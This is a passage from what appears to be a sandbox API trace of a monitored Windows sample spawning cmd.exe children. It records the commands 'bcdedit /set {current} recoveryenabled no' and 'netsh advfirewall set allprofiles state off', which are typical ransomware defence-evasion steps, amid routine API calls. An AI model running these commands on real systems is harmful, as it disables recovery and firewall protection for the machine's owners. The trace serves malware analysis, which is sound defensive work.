(_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.436] _wcsnicmp 
(_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.437] _wcsnicmp 
(_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.438] GetProcessHeap () returned 0x2b0000 [0114.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c46a0 | out: hHeap=0x2b0000) returned 1 [0114.438] GetProcessHeap () returned 0x2b0000 [0114.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2c89e0 [0114.438] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.440] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {current} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x14ed30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {current} recoveryenabled no", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ece0 | out: lpCommandLine="bcdedit /set {current} recoveryenabled no", lpProcessInformation=0x14ece0*(hProcess=0x54, hThread=0x50, dwProcessId=0x7fc, dwThreadId=0x80c)) returned 1 [0115.310] CloseHandle (hObject=0x50) returned 1 [0115.311] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.311] GetProcessHeap () returned 0x2b0000 [0115.311] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc310 | out: hHeap=0x2b0000) returned 1 [0115.311] GetEnvironmentStringsW () returned 0x2cad10* [0115.311] GetProcessHeap () returned 0x2b0000 [0115.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xae8) returned 0x2cb800 [0115.311] FreeEnvironmentStringsW (penv=0x2cad10) returned 1 [0115.311] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0116.809] GetExitCodeProcess (in: hProcess=0x54, 
lpExitCode=0x14ec28 | out: lpExitCode=0x14ec28*=0x0) returned 1 [0116.809] CloseHandle (hObject=0x54) returned 1 [0116.809] _vsnwprintf (in: _Buffer=0x14ee98, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ec38 | out: _Buffer="00000000") returned 8 [0116.809] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.809] GetProcessHeap () returned 0x2b0000 [0116.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb800 | out: hHeap=0x2b0000) returned 1 [0116.809] GetEnvironmentStringsW () returned 0x2cad10* [0116.810] GetProcessHeap () returned 0x2b0000 [0116.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0e) returned 0x2cb830 [0116.810] FreeEnvironmentStringsW (penv=0x2cad10) returned 1 [0116.810] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.810] GetProcessHeap () returned 0x2b0000 [0116.810] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb830 | out: hHeap=0x2b0000) returned 1 [0116.810] GetEnvironmentStringsW () returned 0x2cad10* [0116.810] GetProcessHeap () returned 0x2b0000 [0116.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0e) returned 0x2cb830 [0116.811] FreeEnvironmentStringsW (penv=0x2cad10) returned 1 [0116.811] GetProcessHeap () returned 0x2b0000 [0116.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c89e0 | out: hHeap=0x2b0000) returned 1 [0116.811] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ecf8 | out: lpAttributeList=0x14ecf8) [0116.811] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.811] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.812] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0116.812] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.812] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0116.813] SetConsoleInputExeNameW () returned 0x1 [0116.813] 
GetConsoleOutputCP () returned 0x1b5 [0116.813] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0116.813] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.814] exit (_Code=0) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x46b6a000" os_pid = "0x694" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x618" cmd_line = "\"C:\\Windows\\sysnative\\cmd.exe\" /c netsh advfirewall set allprofiles state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0x738 [0113.982] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef790 | out: lpSystemTimeAsFileTime=0x1ef790*(dwLowDateTime=0x2cde21e0, dwHighDateTime=0x1d5f7c9)) [0113.982] GetCurrentProcessId () returned 0x694 [0113.982] GetCurrentThreadId () returned 0x738 [0114.125] GetTickCount () returned 0x114a3fd [0114.125] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef798 | out: lpPerformanceCount=0x1ef798*=22014824420) returned 1 [0114.150] GetModuleHandleW (lpModuleName=0x0) returned 0x4abf0000 [0114.151] __set_app_type (_Type=0x1) [0114.151] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac17810) returned 0x0 [0114.151] __getmainargs (in: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610, _DoWildCard=0, _StartInfo=0x4ac1e0f4 | out: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610) returned 0 [0114.152] GetCurrentThreadId () returned 0x738 [0114.152] 
OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x738) returned 0x3c [0114.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.153] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0114.153] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.153] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.153] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef728 | out: phkResult=0x1ef728*=0x0) returned 0x2 [0114.154] VirtualQuery (in: lpAddress=0x1ef710, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, 
AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] GetConsoleOutputCP () returned 0x1b5 [0114.154] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.155] SetConsoleCtrlHandler (HandlerRoutine=0x4ac13184, Add=1) returned 1 [0114.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.155] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.155] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0114.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.156] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.157] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0114.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.157] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.157] GetEnvironmentStringsW () returned 0x288b40* [0114.157] GetProcessHeap () returned 0x270000 [0114.157] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa7c) returned 0x2895d0 [0114.158] FreeEnvironmentStringsW (penv=0x288b40) returned 1 [0114.158] GetProcessHeap () returned 0x270000 [0114.158] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8) returned 0x2889c0 [0114.158] GetEnvironmentStringsW () returned 0x288b40* [0114.158] GetProcessHeap () returned 0x270000 [0114.158] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa7c) returned 0x28a060 [0114.159] FreeEnvironmentStringsW (penv=0x288b40) returned 1 [0114.159] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee5e8 | out: phkResult=0x1ee5e8*=0x44) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", 
lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x18, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x0, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.159] RegCloseKey (hKey=0x44) returned 0x0 [0114.159] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee5e8 | out: phkResult=0x1ee5e8*=0x44) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, 
lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x0, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.160] RegCloseKey (hKey=0x44) returned 0x0 [0114.160] time (in: timer=0x0 | out: timer=0x0) returned 0x5e691d8d [0114.160] srand (_Seed=0x5e691d8d) [0114.160] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c netsh advfirewall set allprofiles state off" [0114.160] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c netsh advfirewall set allprofiles state off" [0114.161] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.161] GetProcessHeap () returned 0x270000 [0114.161] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x218) returned 0x28aaf0 [0114.161] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28ab00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.161] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.162] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.162] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.162] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.162] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.162] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.162] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.162] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.162] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.162] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.162] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.162] GetProcessHeap () returned 0x270000 [0114.162] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2895d0 | out: hHeap=0x270000) returned 1 [0114.162] GetEnvironmentStringsW () returned 0x288b40* [0114.163] GetProcessHeap () returned 0x270000 [0114.163] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa94) returned 0x28ad10 
[0114.163] FreeEnvironmentStringsW (penv=0x288b40) returned 1 [0114.163] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.163] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.163] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.163] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.163] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.163] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.164] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.164] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.164] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.164] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.164] GetProcessHeap () returned 0x270000 [0114.164] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x5c) returned 0x28b7b0 [0114.164] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef3f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef3f0, lpFilePart=0x1ef3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef3d0*="Desktop") returned 0x25 [0114.165] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.165] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x28b820 [0114.165] FindClose (in: hFindFile=0x28b820 | out: hFindFile=0x28b820) returned 1 [0114.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x28b820 [0114.165] FindClose (in: hFindFile=0x28b820 | out: hFindFile=0x28b820) returned 1 [0114.166] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0114.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x218e9fe0, ftLastAccessTime.dwHighDateTime=0x1d5f7c9, ftLastWriteTime.dwLowDateTime=0x218e9fe0, ftLastWriteTime.dwHighDateTime=0x1d5f7c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x28b820 [0114.166] FindClose (in: hFindFile=0x28b820 | out: hFindFile=0x28b820) returned 1 [0114.166] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.166] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0114.166] SetEnvironmentVariableW (lpName="=C:", 
lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.168] GetProcessHeap () returned 0x270000 [0114.168] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ad10 | out: hHeap=0x270000) returned 1 [0114.168] GetEnvironmentStringsW () returned 0x28b820* [0114.169] GetProcessHeap () returned 0x270000 [0114.169] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xae8) returned 0x28c310 [0114.169] FreeEnvironmentStringsW (penv=0x28b820) returned 1 [0114.169] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.169] GetProcessHeap () returned 0x270000 [0114.169] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b7b0 | out: hHeap=0x270000) returned 1 [0114.169] GetProcessHeap () returned 0x270000 [0114.169] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4016) returned 0x28ce00 [0114.170] GetProcessHeap () returned 0x270000 [0114.170] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x6c) returned 0x289630 [0114.170] GetProcessHeap () returned 0x270000 [0114.170] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce00 | out: hHeap=0x270000) returned 1 [0114.171] GetConsoleOutputCP () returned 0x1b5 [0114.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.296] GetUserDefaultLCID () returned 0x409 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac27b50, cchData=8 | out: lpLCData=":") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef500, cchData=128 | out: lpLCData="0") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef500, cchData=128 | out: lpLCData="0") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef500, cchData=128 | out: lpLCData="1") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac3a740, cchData=8 | out: lpLCData="/") returned 2 
